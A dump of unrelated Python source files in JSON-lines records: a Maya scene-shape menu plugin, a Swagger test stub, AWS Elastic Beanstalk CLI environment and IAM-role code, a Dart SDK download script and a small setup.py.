)\n\t\n\t# Object mode\n\telse:\n\t\t\n\t\tif len( sceneShapes ) == 1:\n\t\t\tif maya.cmds.getAttr( sceneShapes[0]+\".drawGeometry\" ) or maya.cmds.getAttr( sceneShapes[0]+\".drawChildBounds\" ):\n\t\t\t\tmaya.cmds.menuItem(\n\t\t\t\t\tlabel = \"Component\",\n\t\t\t\t\tradialPosition = \"N\",\n\t\t\t\t\tcommand = IECore.curry( __componentCallback, sceneShapes[0] 
)\n\t\t\t\t\t)\n\n\t\tmaya.cmds.menuItem(\n\t\t\tlabel = \"Preview...\",\n\t\t\tradialPosition = \"NW\",\n\t\t\tsubMenu = True\t\t\n\t\t)\n\t\n\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"All Geometry On\",\n\t\t\t\tradialPosition = \"E\",\n\t\t\t\tcommand = IECore.curry( __setChildrenPreviewAttributes, sceneShapes, \"drawGeometry\", True )\n\t\t\t)\n\t\t\n\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"All Child Bounds On\",\n\t\t\t\tradialPosition = \"SE\",\n\t\t\t\tcommand = IECore.curry( __setChildrenPreviewAttributes, sceneShapes, \"drawChildBounds\", True )\n\t\t\t)\n\t\t\n\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"All Root Bound On\",\n\t\t\t\tradialPosition = \"NE\",\n\t\t\t\tcommand = IECore.curry( __setChildrenPreviewAttributes, sceneShapes, \"drawRootBound\", True )\n\t\t\t)\n\t\t\n\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"All Geometry Off\",\n\t\t\t\tradialPosition = \"W\",\n\t\t\t\tcommand = IECore.curry( __setChildrenPreviewAttributes, sceneShapes, \"drawGeometry\", False )\n\t\t\t)\n\t\t\n\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"All Child Bounds Off\",\n\t\t\t\tradialPosition = \"SW\",\n\t\t\t\tcommand = IECore.curry( __setChildrenPreviewAttributes, sceneShapes, \"drawChildBounds\", False )\n\t\t\t)\n\t\t\n\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"All Root Bound Off\",\n\t\t\t\tradialPosition = \"NW\",\n\t\t\t\tcommand = IECore.curry( __setChildrenPreviewAttributes, sceneShapes, \"drawRootBound\", False )\n\t\t\t)\n\n\t\tmaya.cmds.setParent( \"..\", menu=True )\n\n\t\t\n\t\tcommonTags = None\n\t\tfor fn in fnScS:\n\t\t\tscene = fn.sceneInterface()\n\t\t\ttmpTags = scene.readTags(IECore.SceneInterface.EveryTag)\n\t\t\tif commonTags is None:\n\t\t\t\tcommonTags = set( tmpTags )\n\t\t\telse:\n\t\t\t\tcommonTags.intersection_update( set(tmpTags) )\n\t\t\t\t\n\t\ttagTree = dict()\n\t\tif not commonTags is None:\n\t\t\ttags = list(commonTags)\n\t\t\tfor tag in tags :\n\t\t\t\ttag = str(tag)\n\t\t\t\tparts = tag.split(\":\")\n\t\t\t\tleftOverTag = tag[len(parts[0])+1:]\n\t\t\t\tif not parts[0] in tagTree :\n\t\t\t\t\ttagTree[parts[0]] = [ leftOverTag ]\n\t\t\t\telse :\n\t\t\t\t\ttagTree[parts[0]].append( leftOverTag )\n\t\tif tagTree :\n\n\t\t\ttags = tagTree.keys()\n\t\t\ttags.sort()\n\n\t\t\tdef addTagSubMenuItems( command ):\n\n\t\t\t\timport copy\n\t\t\t\tcopiedTagTree = copy.deepcopy( tagTree )\n\n\t\t\t\tfor tag in tags :\n\t\t\t\t\t\n\t\t\t\t\tsubtags = copiedTagTree[tag]\n\t\t\t\t\tsubtags.sort()\n\n\t\t\t\t\tif \"\" in subtags:\n\t\t\t\t\t\tmaya.cmds.menuItem(\n\t\t\t\t\t\t\tlabel = tag,\n\t\t\t\t\t\t\tcommand = IECore.curry( command, sceneShapes, tag )\n\t\t\t\t\t\t)\n\t\t\t\t\t\tsubtags.remove(\"\")\n\t\t\t\t\t\n\t\t\t\t\tif subtags:\n\t\t\t\t\t\tmaya.cmds.menuItem(\n\t\t\t\t\t\t\tlabel = tag,\n\t\t\t\t\t\t\tsubMenu = True\n\t\t\t\t\t\t)\n\n\t\t\t\t\t\tfor tagSuffix in subtags :\n\t\t\t\t\t\t\tmaya.cmds.menuItem(\n\t\t\t\t\t\t\t\tlabel = tagSuffix,\n\t\t\t\t\t\t\t\tcommand = IECore.curry( command, sceneShapes, tag + \":\" + tagSuffix )\n\t\t\t\t\t\t\t)\n\t\t\t\t\t\tmaya.cmds.setParent( \"..\", menu=True )\t\n\n\t\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"Tags filter...\",\n\t\t\t\tradialPosition = \"S\",\n\t\t\t\tsubMenu = True\n\t\t\t)\n\n\t\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"Display All\",\n\t\t\t\tcommand = IECore.curry( __setTagsFilterPreviewAttributes, sceneShapes, \"\" )\n\t\t\t)\n\n\t\t\taddTagSubMenuItems( __setTagsFilterPreviewAttributes )\n\t\t\t\t\t\n\t\t\tmaya.cmds.setParent( \"..\", menu=True )\t\t\t\n\t\t\t\n\t\tmaya.cmds.menuItem(\n\t\t\tlabel = 
\"Expand...\",\n\t\t\tradialPosition = \"SE\",\n\t\t\tsubMenu = True\n\t\t)\n\t\n\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"Recursive Expand As Geometry\",\n\t\t\t\tradialPosition = \"W\",\n\t\t\t\tcommand = IECore.curry( __expandAsGeometry, sceneShapes )\n\t\t\t)\n\n\t\tif any( map(lambda x: x.canBeExpanded(), fnScS) ):\n\t\t\t\n\t\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"Expand One Level\",\n\t\t\t\tradialPosition = \"E\",\n\t\t\t\tcommand = IECore.curry( __expandOnce, sceneShapes )\n\t\t\t)\n\t\t\t\n\t\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"Recursive Expand\",\n\t\t\t\tradialPosition = \"N\",\n\t\t\t\tcommand = IECore.curry( __expandAll, sceneShapes )\n\t\t\t)\n\t\t\t\n\t\t\tif len( sceneShapes ) == 1:\n\t\t\t\tif fnScS[0].selectedComponentNames() :\n\t\t\t\t\tmaya.cmds.menuItem(\n\t\t\t\t\t\tlabel = \"Expand to Selected Components\",\n\t\t\t\t\t\tradialPosition = \"S\",\n\t\t\t\t\t\tcommand = IECore.curry( __expandToSelected, sceneShapes[0] )\n\t\t\t\t\t)\n\t\t\t\n\t\tif tagTree :\n\t\t\tmaya.cmds.menuItem(\n\t\t\t\tlabel = \"Expand by Tag...\",\n\t\t\t\tradialPosition = \"S\",\n\t\t\t\tsubMenu = True\n\t\t\t)\n\t\t\n\t\t\taddTagSubMenuItems( __expandAll )\n\t\t\t\t\t\n\t\t\tmaya.cmds.setParent( \"..\", menu=True )\t\t\t\n\n\t\tmaya.cmds.setParent( \"..\", menu=True )\n\n\t\tparentSceneShape = __parentSceneShape( sceneShapes )\n\n\t\tif any( map(lambda x: x.canBeCollapsed(), fnScS) ) or ( parentSceneShape and IECoreMaya.FnSceneShape( parentSceneShape ).canBeCollapsed() ):\n\t\t\t\n\t\t\tmaya.cmds.menuItem(\n\t\t\t\t\tlabel = \"Collapse...\",\n\t\t\t\t\tradialPosition = \"SW\",\n\t\t\t\t\tsubMenu = True\n\t\t\t\t)\n\t\t\t\n\t\t\tif parentSceneShape and IECoreMaya.FnSceneShape( parentSceneShape ).canBeCollapsed():\n\t\t\t\t\n\t\t\t\tparentName = maya.cmds.listRelatives( parentSceneShape, p=True )[0]\n\t\t\t\tmaya.cmds.menuItem(\n\t\t\t\t\t\tlabel = \"Collapse to Parent: \"+parentName,\n\t\t\t\t\t\tradialPosition = \"N\",\n\t\t\t\t\t\tcommand = IECore.curry( __collapseChildren, [parentSceneShape] )\n\t\t\t\t\t)\n\t\t\t\n\t\t\tif any( map(lambda x: x.canBeCollapsed(), fnScS) ):\n\t\t\t\tmaya.cmds.menuItem(\n\t\t\t\t\t\tlabel = \"Collapse Children\",\n\t\t\t\t\t\tradialPosition = \"W\",\n\t\t\t\t\t\tcommand = IECore.curry( __collapseChildren, sceneShapes )\n\t\t\t\t\t)\n\t\t\t\t\n\t\t\tmaya.cmds.setParent( \"..\", menu=True )\n\n\tfor c in __dagMenuCallbacks :\n\t\n\t\tc( menu, sceneShape )\n\n## Returns all the sceneShapes that do not have a valid scene interface\ndef __invalidSceneShapes( sceneShapes ):\n\t\n\tinvalid = []\n\tfor sceneShape in sceneShapes:\n\t\tfn = IECoreMaya.FnSceneShape( sceneShape )\n\t\tif fn.sceneInterface() is None:\n\t\t\tinvalid.append( sceneShape )\n\treturn invalid\n\n## Returns all the selected scene shapes\ndef __selectedSceneShapes() :\n\t\n\tallSceneShapes = []\n\t\n\tselectedSceneShapes = maya.cmds.ls( sl=True, l=True )\n\tfor shape in selectedSceneShapes:\n\t\t# Make sure we have the shape name, it could be a component \n\t\tshapeName = shape.split(\".f[\")[0]\n\t\tif maya.cmds.nodeType( shapeName ) == \"ieSceneShape\" and not shapeName in allSceneShapes:\n\t\t\tallSceneShapes.append( shapeName )\n\t\telse:\n\t\t\tchildren = maya.cmds.listRelatives( shapeName, children=True, type=\"ieSceneShape\", fullPath=True ) or []\n\t\t\tfor child in children:\n\t\t\t\tif not child in allSceneShapes:\n\t\t\t\t\tallSceneShapes.append( child )\n\treturn allSceneShapes\n\n## Turns on child bounds and switches to component mode\ndef __componentCallback( sceneShape, 
*unused ) :\n\n\tparent = maya.cmds.listRelatives( sceneShape, parent=True, fullPath=True )[0]\n\tmaya.cmds.selectType( ocm=True, alc=False, facet=True )\n\tmaya.cmds.hilite( parent )\n\t\n## Switches to object mode\ndef __objectCallback( sceneShape, *unused ) :\n\n\tparent = maya.cmds.listRelatives( sceneShape, parent=True, fullPath=True )[0]\n\tmaya.cmds.hilite( parent, unHilite=True )\n\tselection = maya.cmds.ls( selection=True )\n\tmaya.cmds.selectMode( object=True )\n\tif selection :\n\t\tmaya.cmds.select( selection, replace=True )\n\telse :\n\t\tmaya.cmds.select( clear=True )\n\n## Print the existing component names for the scene shape\ndef __printComponents( sceneShape, *unused ) :\n\n\tfnS = IECoreMaya.FnSceneShape( sceneShape )\n\tnames = fnS.componentNames()\n\tnames.sort()\n\tprint \"\\n\"\n\tprint \" \".join( names ) ,\n\tprint \"\\n\"\n\n## Print the selected component names for the scene shape\ndef __printSelectedComponents( sceneShape, *unused ) :\n\n\tfnS = IECoreMaya.FnSceneShape( sceneShape )\n\tselectedNames = fnS.selectedComponentNames()\n\tif selectedNames:\n\t\tselectedNames = list( selectedNames )\n\t\tselectedNames.sort()\n\t\tprint \"\\n\"\n\t\tprint \" \".join( selectedNames ) ,\n\t\tprint \"\\n\"\n\n## Expand each scene shape one level down\ndef __expandOnce( sceneShapes, *unused ) :\n\t\n\ttoSelect = []\n\tfor sceneShape in sceneShapes:\n\t\tfnS = IECoreMaya.FnSceneShape( sceneShape )\n\t\tnew = fnS.expandOnce( preserveNamespace=True )\n\t\ttoSelect.extend( map( lambda x: x.fullPathName(), new ) )\n\tif toSelect:\n\t\tmaya.cmds.select( toSelect, replace=True )\n\n## Recursively expand the scene shapes\ndef __expandAll( sceneShapes, tagName=None, *unused ) :\n\t\n\ttoSelect = []\n\tfor sceneShape in sceneShapes:\n\t\tfnS = IECoreMaya.FnSceneShape( sceneShape )\n\t\tnewFn = fnS.expandAll( preserveNamespace=True, tagName=tagName )\n\t\t\n\t\ttoSelect.extend( map( lambda x: x.fullPathName(), newFn ) )\n\tif toSelect:\n\t\tmaya.cmds.select( toSelect, replace=True )\n\n## Recursively expand the scene shapes and converts objects to geometry\ndef __expandAsGeometry( sceneShapes, *unused ) :\n\t\n\tfor sceneShape in sceneShapes:\n\t\tfnS = IECoreMaya.FnSceneShape( sceneShape )\n\t\tfnS.convertAllToGeometry( True )\n\n## Expand the scene shape the minimal amount to reach the selected components\ndef __expandToSelected( sceneShape, *unused ) :\n\n\tfnScS = IECoreMaya.FnSceneShape( sceneShape )\n\tsceneShape = fnScS.fullPathName()\n\tselectedNames = fnScS.selectedComponentNames()\n\tif not selectedNames:\n\t\treturn\n\t\n\tif \"/\" in selectedNames:\n\t\tselectedNames.remove(\"/\")\n\t\n\t# Go back to object mode\n\tparent = maya.cmds.listRelatives( sceneShape, parent=True, fullPath=True )[0]\n\tmaya.cmds.hilite( parent, unHilite=True )\n\tmaya.cmds.selectMode( object=True )\n\t\n\tif selectedNames == []:\n\t\treturn\n\t\n\ttoSelect = []\t\n\n\tfor selected in selectedNames:\n\t\ttransformName = parent\n\t\ttransformNames = [ transformName ]\n\t\tfor item in selected.split(\"/\")[1:-1]:\n\t\t\ttransformName = transformName + \"|\" + item\n\t\t\tif not transformName in transformNames:\n\t\t\t\ttransformNames.append( transformName )\n\t\t\n\t\tfor transform in transformNames:\n\t\t\tshape = maya.cmds.listRelatives( transform, fullPath=True, type = \"ieSceneShape\" )[0]\n\t\t\tfnS = IECoreMaya.FnSceneShape( shape )\n\t\t\tfnS.expandOnce()\n\t\t\n\t\ttoSelect.append( transformNames[-1] )\n\tif toSelect:\n\t\tmaya.cmds.select( toSelect, replace=True )\n\n## Collapse all the 
children of the scene shapes\ndef __collapseChildren( sceneShapes, *unused ) :\n\t\n\tfor sceneShape in sceneShapes:\n\t\tfnS = IECoreMaya.FnSceneShape( sceneShape )\n\t\tfnS.collapse()\n\n## Returns the first common parent scene shape for the given scene shapes\n# Returns None if no parent found.\ndef __parentSceneShape( sceneShapes ):\n\t\n\tdef getParentShapes( transform, allParentShapes ):\n\t\tparent = maya.cmds.listRelatives( transform, p=True, fullPath=True )\n\t\tif parent:\n\t\t\tparentShape = maya.cmds.listRelatives( parent[0], fullPath=True, type = \"ieSceneShape\" )\n\t\t\tif parentShape:\n\t\t\t allParentShapes.append( parentShape[0] )\n\t\t\t getParentShapes( parent[0], allParentShapes )\n\t\t\n\tparents = None\n\tfor sceneShape in sceneShapes:\n\t\ttransform = maya.cmds.listRelatives( sceneShape, parent=True, fullPath=True )\n\t\tif transform:\n\t\t\tallParentShapes = []\n\t\t\tgetParentShapes( transform[0], allParentShapes )\n\t\t\tif parents is None:\n\t\t\t\tparents = set( allParentShapes )\n\t\t\telse:\n\t\t\t\tparents.intersection_update( set(allParentShapes) )\n\tif parents:\n\t\tparent = \"\"\n\t\tfor p in parents:\n\t\t\tif p.count(\"|\") > parent.count(\"|\"):\n\t\t\t\tparent = p\n\t\treturn parent\n\n\treturn None\n\n## Sets the given preview attribute on the scene shapes with the given boolean value\n# Preview attributes can be drawGeometry, drawLocators, drawRootBound and drawChildBounds\ndef __setChildrenPreviewAttributes( sceneShapes, attributeName, value, *unused ) :\n\n\tfor sceneShape in sceneShapes:\n\t\ttransform = maya.cmds.listRelatives( sceneShape, parent=True, fullPath=True )\n\t\tif transform:\n\t\t\tallChildren = maya.cmds.listRelatives( transform[0], ad=True, fullPath=True, type = \"ieSceneShape\" ) or []\n\t\t\tfor node in allChildren:\n\t\t\t\tmaya.cmds.setAttr( node+\".\"+attributeName, value )\n\n## Sets the given tags filter attribute on the scene shapes with the given string value\ndef __setTagsFilterPreviewAttributes( sceneShapes, tagName, *unused ) :\n\n\tfor sceneShape in sceneShapes:\n\t\ttransform = maya.cmds.listRelatives( sceneShape, parent=True, fullPath=True )\n\t\tif transform:\n\t\t\tallChildren = maya.cmds.listRelatives( transform[0], ad=False, fullPath=True, type = \"ieSceneShape\" ) or []\n\t\t\tfor node in allChildren:\n\t\t\t\tmaya.cmds.setAttr( node+\".drawTagsFilter\", tagName, type = \"string\" )\n\ndef __createLocatorAtPoints( sceneShape, childPlugSuffixes, *unused ) :\n\t\n\tfnSc = IECoreMaya.FnSceneShape( sceneShape )\n\tselectedNames = fnSc.selectedComponentNames()\n\n\tlocators = []\n\tfor name in selectedNames :\n\t\tlocators.extend( fnSc.createLocatorAtPoints( name, childPlugSuffixes ) )\n\t\t\n\tmaya.cmds.select( locators, replace=True )\n\ndef __createLocatorWithTransform( sceneShape, *unused ) :\n\t\n\tfnSc = IECoreMaya.FnSceneShape( sceneShape )\n\tselectedNames = fnSc.selectedComponentNames()\n\n\tlocators = []\n\tfor name in selectedNames :\n\t\tlocators.append( fnSc.createLocatorAtTransform( name ) )\n\n\tmaya.cmds.select( locators, replace=True )\n\n"} {"ext": "py", "sha": "1a30b3c3dfb43823629a543fc5c03f20eed56230", "content": "# coding: utf-8\n\n\"\"\"\n Deep Lynx\n\n The construction of megaprojects has consistently demonstrated challenges for project managers in regard to meeting cost, schedule, and performance requirements. Megaproject construction challenges are common place within megaprojects with many active projects in the United States failing to meet cost and schedule efforts by significant margins. 
Currently, engineering teams operate in siloed tools and disparate teams where connections across design, procurement, and construction systems are translated manually or over brittle point-to-point integrations. The manual nature of data exchange increases the risk of silent errors in the reactor design, with each silent error cascading across the design. These cascading errors lead to uncontrollable risk during construction, resulting in significant delays and cost overruns. Deep Lynx allows for an integrated platform during design and operations of mega projects. The Deep Lynx Core API delivers a few main features. 1. Provides a set of methods and endpoints for manipulating data in an object oriented database. This allows us to store complex datatypes as records and then to compile them into actual, modifiable objects at run-time. Users can store taxonomies or ontologies in a readable format. 2. Provides methods for storing and retrieving data in a graph database. This data is structured and validated against the aformentioned object oriented database before storage. # noqa: E501\n\n OpenAPI spec version: 1.0\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\nfrom __future__ import absolute_import\n\nimport unittest\n\nimport swagger_client\nfrom swagger_client.models.credential_validation_result import CredentialValidationResult # noqa: E501\nfrom swagger_client.rest import ApiException\n\n\nclass TestCredentialValidationResult(unittest.TestCase):\n \"\"\"CredentialValidationResult unit test stubs\"\"\"\n\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n def testCredentialValidationResult(self):\n \"\"\"Test CredentialValidationResult\"\"\"\n # FIXME: construct object with mandatory attributes with example values\n # model = swagger_client.models.credential_validation_result.CredentialValidationResult() # noqa: E501\n pass\n\n\nif __name__ == '__main__':\n unittest.main()\n"} {"ext": "py", "sha": "1a30b53279a33a64f5179950d3a2d31b389dfaae", "content": "# Copyright 2014 Amazon.com, Inc. or its affiliates. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"). You\n# may not use this file except in compliance with the License. A copy of\n# the License is located at\n#\n# http://aws.amazon.com/apache2.0/\n#\n# or in the \"license\" file accompanying this file. This file is\n# distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF\n# ANY KIND, either express or implied. See the License for the specific\n# language governing permissions and limitations under the License.\n\nimport re\nimport time\n\nfrom cement.utils.misc import minimal_logger\n\nfrom ..lib import elasticbeanstalk, iam, utils\nfrom ..lib.aws import InvalidParameterValueError\nfrom ..core import io\nfrom ..objects.exceptions import TimeoutError, AlreadyExistsError, \\\n NotAuthorizedError, NotSupportedError\nfrom ..resources.strings import strings, responses, prompts\nfrom . 
import commonops\n\nLOG = minimal_logger(__name__)\nDEFAULT_ROLE_NAME = 'aws-elasticbeanstalk-ec2-role'\nDEFAULT_SERVICE_ROLE_NAME = 'aws-elasticbeanstalk-service-role'\n\n\ndef make_new_env(env_request, branch_default=False,\n nohang=False, interactive=True, timeout=None):\n resolve_roles(env_request, interactive)\n\n # deploy code\n if not env_request.sample_application and not env_request.version_label:\n io.log_info('Creating new application version using project code')\n env_request.version_label = \\\n commonops.create_app_version(env_request.app_name)\n\n if env_request.version_label is None or env_request.sample_application:\n env_request.version_label = \\\n commonops.create_dummy_app_version(env_request.app_name)\n\n # Create env\n if env_request.key_name:\n commonops.upload_keypair_if_needed(env_request.key_name)\n\n io.log_info('Creating new environment')\n result, request_id = create_env(env_request,\n interactive=interactive)\n\n env_name = result.name # get the (possibly) updated name\n\n # Edit configurations\n ## Get default environment\n default_env = commonops.get_current_branch_environment()\n ## Save env as branch default if needed\n if not default_env or branch_default:\n commonops.set_environment_for_current_branch(env_name)\n\n # Print status of env\n commonops.print_env_details(result, health=False)\n\n if nohang:\n return\n\n io.echo('Printing Status:')\n try:\n commonops.wait_for_success_events(request_id,\n timeout_in_minutes=timeout)\n except TimeoutError:\n io.log_error(strings['timeout.error'])\n\n\ndef create_env(env_request, interactive=True):\n # If a template is being used, we want to try using just the template\n if env_request.template_name:\n platform = env_request.platform\n env_request.platform = None\n else:\n platform = None\n while True:\n try:\n return elasticbeanstalk.create_environment(env_request)\n\n except InvalidParameterValueError as e:\n if e.message == responses['app.notexists'].replace(\n '{app-name}', '\\'' + env_request.app_name + '\\''):\n # App doesnt exist, must be a new region.\n ## Lets create the app in the region\n commonops.create_app(env_request.app_name)\n elif e.message == responses['create.noplatform']:\n if platform:\n env_request.platform = platform\n else:\n raise\n elif interactive:\n LOG.debug('creating env returned error: ' + e.message)\n if re.match(responses['env.cnamenotavailable'], e.message):\n io.echo(prompts['cname.unavailable'])\n cname = io.prompt_for_cname()\n elif re.match(responses['env.nameexists'], e.message):\n io.echo(strings['env.exists'])\n current_environments = commonops.get_all_env_names()\n unique_name = utils.get_unique_name(env_request.env_name,\n current_environments)\n env_request.env_name = io.prompt_for_environment_name(\n default_name=unique_name)\n elif e.message == responses['app.notexists'].replace(\n '{app-name}', '\\'' + env_request.app_name + '\\''):\n # App doesnt exist, must be a new region.\n ## Lets create the app in the region\n commonops.create_app(env_request.app_name)\n else:\n raise\n else:\n raise\n\n # Try again with new values\n\n\ndef get_default_profile():\n \"\"\" Get the default elasticbeanstalk IAM profile,\n Create it if it doesn't exist \"\"\"\n\n # get list of profiles\n try:\n profile = DEFAULT_ROLE_NAME\n try:\n iam.create_instance_profile(profile)\n io.log_info('Created default instance profile.')\n role = get_default_role()\n iam.add_role_to_profile(profile, role)\n except AlreadyExistsError:\n pass\n except NotAuthorizedError:\n # Not a root account. 
Just assume role exists\n io.log_info('No IAM privileges: assuming default '\n 'instance profile exists.')\n return DEFAULT_ROLE_NAME\n\n return profile\n\n\ndef get_default_role():\n role = DEFAULT_ROLE_NAME\n document = '{\"Version\": \"2008-10-17\",\"Statement\": [{\"Action\":' \\\n ' \"sts:AssumeRole\",\"Principal\": {\"Service\": ' \\\n '\"ec2.amazonaws.com\"},\"Effect\": \"Allow\",\"Sid\": \"\"}]}'\n try:\n iam.create_role(role, document)\n except AlreadyExistsError:\n pass\n return role\n\n\ndef get_service_role():\n try:\n roles = iam.get_role_names()\n if DEFAULT_SERVICE_ROLE_NAME not in roles:\n return None\n except NotAuthorizedError:\n # No permissions to list roles\n # Assume role exists, we will handle error at a deeper level\n pass\n\n return DEFAULT_SERVICE_ROLE_NAME\n\n\ndef create_default_service_role():\n \"\"\"\n Create the default service role\n \"\"\"\n io.log_info('Creating service role {} with default permissions.'\n .format(DEFAULT_SERVICE_ROLE_NAME))\n trust_document = _get_default_service_trust_document()\n json_policy = _get_default_service_role_policy()\n role_name = DEFAULT_SERVICE_ROLE_NAME\n policy_name = 'awsebcli_aws-elasticbeanstalk-service-role_{}'\\\n .format(int(time.time()))\n try:\n iam.create_role_with_policy(role_name, trust_document,\n policy_name, json_policy)\n except NotAuthorizedError as e:\n # NO permissions to create or do something\n raise NotAuthorizedError(prompts['create.servicerole.nopermissions']\n .format(DEFAULT_SERVICE_ROLE_NAME, e))\n\n return DEFAULT_SERVICE_ROLE_NAME\n\n\ndef resolve_roles(env_request, interactive):\n \"\"\"\n Resolves instance-profile and service-role\n :param env_request: environment request\n :param interactive: boolean\n \"\"\"\n LOG.debug('Resolving roles')\n\n if env_request.instance_profile is None and \\\n env_request.template_name is None:\n # Service supports no profile, however it is not good/recommended\n # Get the eb default profile\n env_request.instance_profile = get_default_profile()\n\n\n if (env_request.platform.has_healthd_support() and # HealthD enabled\n (env_request.service_role is None) and\n (env_request.template_name is None)):\n role = get_service_role()\n if role is None:\n if interactive:\n io.echo()\n io.echo(prompts['create.servicerole.info'])\n input = io.get_input(prompts['create.servicerole.view'],\n default='')\n\n if input.strip('\"').lower() == 'view':\n io.echo(_get_default_service_role_policy())\n io.get_input(prompts['general.pressenter'])\n\n role = create_default_service_role()\n else:\n raise NotSupportedError(prompts['create.servicerole.required'])\n\n env_request.service_role = role\n\n\ndef _get_default_service_trust_document():\n \"\"\"\n Just a string representing the service role policy.\n Includes newlines for pretty printing :)\n \"\"\"\n return \\\n'''{\n \"Version\": \"2012-10-17\",\n \"Statement\": [{\n \"Sid\": \"\",\n \"Effect\": \"Allow\",\n \"Principal\": {\n \"Service\": \"elasticbeanstalk.amazonaws.com\"\n },\n \"Action\": \"sts:AssumeRole\",\n \"Condition\": {\n \"StringEquals\": {\n \"sts:ExternalId\": \"elasticbeanstalk\"\n }\n }\n }]\n}'''\n\n\ndef _get_default_service_role_policy():\n \"\"\"\n Just a string representing the service role policy.\n Includes newlines for pretty printing :)\n \"\"\"\n return \\\n'''{\n \"Version\": \"2012-10-17\",\n \"Statement\": [{\n \"Effect\": \"Allow\",\n \"Action\": [\n \"elasticloadbalancing:DescribeInstanceHealth\",\n \"ec2:DescribeInstances\",\n \"ec2:DescribeInstanceStatus\",\n \"ec2:GetConsoleOutput\",\n 
\"ec2:AssociateAddress\",\n \"ec2:DescribeAddresses\",\n \"ec2:DescribeSecurityGroups\",\n \"sqs:GetQueueAttributes\",\n \"sqs:GetQueueUrl\",\n \"autoscaling:DescribeAutoScalingGroups\",\n \"autoscaling:DescribeAutoScalingInstances\",\n \"autoscaling:DescribeScalingActivities\",\n \"autoscaling:DescribeNotificationConfigurations\"\n ],\n \"Resource\": [\"*\"]\n }]\n}'''"} {"ext": "py", "sha": "1a30b5e798e4cba290fc30b4e086e8e5467436e2", "content": "#!/usr/bin/env python\n# Copyright 2016 The Dart project authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\n# This script downloads the latest dev SDK from\n# http://gsdview.appspot.com/dart-archive/channels/dev/raw/latest/sdk/\n# into tools/sdks/. It is intended to be invoked from Jiri hooks in\n# a Fuchsia checkout.\n\nimport os\nimport sys\nimport zipfile\nimport urllib\nimport utils\n\nHOST_OS = utils.GuessOS()\nHOST_ARCH = utils.GuessArchitecture()\nSCRIPT_DIR = os.path.dirname(sys.argv[0])\nDART_ROOT = os.path.realpath(os.path.join(SCRIPT_DIR, '..'))\n\nDEFAULT_DART_VERSION = 'latest'\nBASE_URL = 'http://gsdview.appspot.com/dart-archive/channels/dev/raw/%s/sdk/%s'\n\n\ndef host_os_for_sdk(host_os):\n if host_os.startswith('macos'):\n return 'mac'\n if host_os.startswith('win'):\n return 'windows'\n return host_os\n\n\n# Python's zipfile doesn't preserve file permissions during extraction, so we\n# have to do it manually.\ndef extract_file(zf, info, extract_dir):\n try:\n zf.extract(info.filename, path=extract_dir)\n out_path = os.path.join(extract_dir, info.filename)\n perm = info.external_attr >> 16L\n os.chmod(out_path, perm)\n except IOError as err:\n if 'dart-sdk/bin/dart' in err.filename:\n print(\n 'Failed to extract the new Dart SDK dart binary. 
' +\n 'Kill stale instances (like the analyzer) and try the update again'\n )\n return False\n raise\n return True\n\n\ndef main(argv):\n host_os = host_os_for_sdk(HOST_OS)\n zip_file = ('dartsdk-%s-x64-release.zip' % HOST_OS)\n sha_file = zip_file + '.sha256sum'\n sdk_path = os.path.join(DART_ROOT, 'tools', 'sdks')\n local_sha_path = os.path.join(sdk_path, sha_file)\n remote_sha_path = os.path.join(sdk_path, sha_file + '.remote')\n zip_path = os.path.join(sdk_path, zip_file)\n\n sdk_version = DEFAULT_DART_VERSION\n sha_url = (BASE_URL % (sdk_version, sha_file))\n zip_url = (BASE_URL % (sdk_version, zip_file))\n\n local_sha = ''\n if os.path.isfile(local_sha_path):\n with open(local_sha_path, 'r') as fp:\n local_sha = fp.read()\n\n remote_sha = ''\n urllib.urlretrieve(sha_url, remote_sha_path)\n with open(remote_sha_path, 'r') as fp:\n remote_sha = fp.read()\n os.remove(remote_sha_path)\n\n if local_sha == '' or local_sha != remote_sha:\n print 'Downloading prebuilt Dart SDK from: ' + zip_url\n urllib.urlretrieve(zip_url, zip_path)\n with zipfile.ZipFile(zip_path, 'r') as zf:\n for info in zf.infolist():\n if not extract_file(zf, info, sdk_path):\n return -1\n with open(local_sha_path, 'w') as fp:\n fp.write(remote_sha)\n return 0\n\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv))\n"} {"ext": "py", "sha": "1a30b712bd8d569d2562e6e7c4f964befb20ca90", "content": "from setuptools import setup\n\nsetup(\n # Packaging meta-data\n name='Vimcryption',\n version='0.1',\n description='Test package for vimcryption VIM plugin.',\n author='Tom Manner, Miguel Nistal',\n author_email='tom.s.manner@gmail.com, nistam328@gmail.com',\n url='https://www.github.com/tsmanner/vimcryption',\n # Travis Unit-Test Installation\n install_requires=[\n 'anybadge==0.1.0.dev2',\n 'codecov',\n 'coverage>=4.5',\n 'coverage-badge',\n 'nose2',\n 'nose2[coverage_plugin]>=0.6.5',\n 'numpy',\n 'pylint',\n ],\n packages=[\n 'encryptionengine',\n ],\n)\n"} {"ext": "py", "sha": "1a30b966604a7174adb21aa449e1afcf3d23daa2", "content": "#!/usr/bin/env python\n# coding: utf-8\n\n# Copyright (c) Microsoft. All rights reserved.\n# Licensed under the MIT license. 
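# Sketch of the permission-preserving extraction done by extract_file() in the
# Dart SDK update script above: zipfile does not restore POSIX mode bits, but
# they are stored in the upper 16 bits of ZipInfo.external_attr.  This is a
# Python 3 rendering of the same idea (the original script is Python 2, hence
# its 16L literal).
import os
import zipfile

def extract_preserving_mode(archive_path, dest_dir):
    with zipfile.ZipFile(archive_path) as zf:
        for info in zf.infolist():
            zf.extract(info, path=dest_dir)
            mode = info.external_attr >> 16   # upper 16 bits hold the Unix mode
            if mode:
                os.chmod(os.path.join(dest_dir, info.filename), mode)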
